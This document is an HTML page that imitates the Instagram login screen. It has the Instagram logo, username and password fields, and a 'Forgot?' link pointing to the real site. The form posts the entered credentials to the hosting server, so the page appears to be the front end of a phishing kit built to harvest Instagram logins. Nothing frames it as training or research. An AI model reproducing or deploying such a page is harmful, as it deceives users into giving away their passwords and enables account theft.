<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
    <link rel="stylesheet" href="../static/index.css">
    <link rel="icon" href="https://icons8.com/icon/32323/instagram" type="image/x-icon">
</head>
<body>

<div id="wrapper">
  <div class="main-content">
    <div class="header">
      <img src="https://i.imgur.com/zqpwkLQ.png" />
    </div>
    <div class="l-part">
        <form method="post">
      <input name="username" type="text" placeholder="Phone number, username or email address" class="input-1" />
      <div class="overlap-text">
        <input name="password" type="password" placeholder="Password" class="input-2" />
        <a href="https://www.instagram.com">Forgot?</a>
      </div>
      <input type="submit" value="Log in" class="btn" />
        </form>
    </div>
  </div>
  <div class="sub-content">
    <div class="s-part">
      Don't have an account?<a href="#">Sign up</a>
    </div>
  </div>
</div>

</body>
</html>